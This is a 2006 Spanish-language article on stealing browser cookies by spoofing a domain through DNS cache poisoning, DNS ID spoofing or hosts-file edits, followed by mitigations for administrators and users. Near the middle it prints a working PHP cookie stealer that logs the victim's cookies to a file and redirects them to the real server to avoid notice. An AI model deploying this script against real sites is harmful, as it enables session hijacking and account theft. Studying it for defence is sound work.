Dns Spoofing Cookie Theft

Robo de cookies por falsificación de dominio


Como administrador de unos foros me interesa conocer los posibles ataques contra los mismos y estaba pensando en los métodos para robar cookies y vi que lo único que valida el browser para mandarlas es el nombre de dominio, uri (path) y tiempo de expiracion, por lo que se me ocurrió obtener el cookie al falsificar el nombre de dominio, un enfoque diferente a ataques de xss y sniffing.

Solamente es necesario un dominio falsificado que solicite el cookie. Existen varias formas de falsificar un nombre de dominio como envenenamiento del cache o id spoofing, útiles en redes locales.

El envenenamiento del cache es hacer que el servidor dns al hacer una búsqueda en nuestro servidor envenenado force una transferencia de registros (zone transfer) y almacene el registro del host falso.

Id spoofing consiste en interceptar el valor del ID del paquete de DNS y enviar una contestación falsa con ese ID antes que el verdadero servidor de nombres.

El archivo hosts, en el directorio de windows o /etc, relaciona localmente los hosts con ips. Si se tiene permiso de escritura a ese archivo es muy facil direccionar dominios.


Ya que tenemos el dominio falsificado es necesario obtener el cookie y esto se puede hacer utilizando javascript y una pagina que almacene los valores, o si queremos dejar menos rastro y redireccionar al verdadero ip podemos usar el siguiente codigo php:

<?PHP
// PHP Cookie Stealer & ip redirect v0.4pub 
// Para usarse junto con dns spoofing
// hkm 03/31/06

$host = $_SERVER['HTTP_HOST']; //obtenemos el host spoofeado
if ($host){
	$ip = gethostbyname($host); //obtenemos el ip real
	$file = fopen("cookies.txt","a+"); //grabamos las cookies en cookies.txt
	for ($i=0;$i < count($_COOKIE);$i++){
		fwrite($file, "\r\n".key($_COOKIE)." = ".current($_COOKIE));
		next($_COOKIE);}
	fclose($file);
	header("location: http://".$ip.$_SERVER['PHP_SELF']); //redireccionamos al ip + path real
}
?>


Cuando se realiza dns spoof es posible hacer un ataque Man in The Middle, interceptando los paquetes y redireccionandolos al servidor verdadero haciendo un poco menos detectable este ataque.

Se pueden tomar algunas medidas para prevenir el dns spoofing como administradores:
-Limitar el cache y asegurarse que no esta guardando registros adicionales
-Mantener el servidor DNS actualizado y con los ultimos parches
-No hacer que los sistemas seguros dependan de DNS
-Usar encripción: firmar las zonas con tsig hmac-md5 y usar dnssec

Las medidas que se pueden tomar como usuario son:
-Siempre checar que la pagina no tenga problemas de direccionamiento
-No depender de cookies como único método de autenticación
-Tener los últimos parches del sistema
-Usar encripción



hkm[@]hakim.ws

(4/2/2006)


4.3.4 Sending Cookies to the Origin Server
http://www.ietf.org/rfc/rfc2109.txt

Chapter 11: Securing your Name Server
DNS & BIND O'Reilly IV Edition (Albitz & Liu)

DNS Spoofing techniques - Spacefox
http://www.securesphere.net/download/papers/dnsspoof.htm

Cookies
http://www.felixgers.de/teaching/php/cookies1.html